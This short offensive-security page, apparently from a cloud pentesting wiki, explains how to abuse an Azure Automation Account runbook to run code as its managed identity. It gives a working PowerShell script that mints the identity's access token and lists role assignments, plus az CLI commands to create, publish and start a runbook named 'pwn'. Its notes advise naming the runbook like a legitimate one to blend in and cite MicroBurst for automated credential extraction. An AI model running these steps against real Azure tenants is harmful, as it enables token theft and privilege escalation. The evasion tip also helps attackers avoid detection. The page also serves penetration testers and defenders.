A runbook is a script the Automation Account executes under its system-assigned managed identity (or legacy RunAs). With write access to the account, publish a runbook that mints the identity's token or runs arbitrary commands, start it, and read the job output. This is the cleanest arbitrary-code-as-a-privileged-identity primitive in Azure.
Writing and starting a runbook#
cat > r.ps1 <<'EOF'
Connect-AzAccount -Identity | Out-Null
(Get-AzAccessToken -ResourceUrl "https://management.azure.com/").Token
Get-AzRoleAssignment | Out-String
EOF
az automation runbook create -g <rg> --automation-account-name <aa> -n pwn --type PowerShell
az automation runbook replace-content -g <rg> --automation-account-name <aa> -n pwn --content @r.ps1
az automation runbook publish -g <rg> --automation-account-name <aa> -n pwn
az automation runbook start -g <rg> --automation-account-name <aa> -n pwn
# then read the job output for the token
Exploitation notes#
- The token is the Automation Account's managed identity; its role assignments are often Contributor or higher across the subscription.
Get-AzPasswords(MicroBurst) automates publishing a collection runbook and pulling the account's tokens and cleartext assets in one step.- Jobs and their output are logged in the account; a runbook named like a legitimate one blends in.
Tools#
- Azure CLI (
az automation runbook), Az PowerShell (Connect-AzAccount -Identity). - MicroBurst (
Get-AzPasswords): automated runbook-based credential extraction.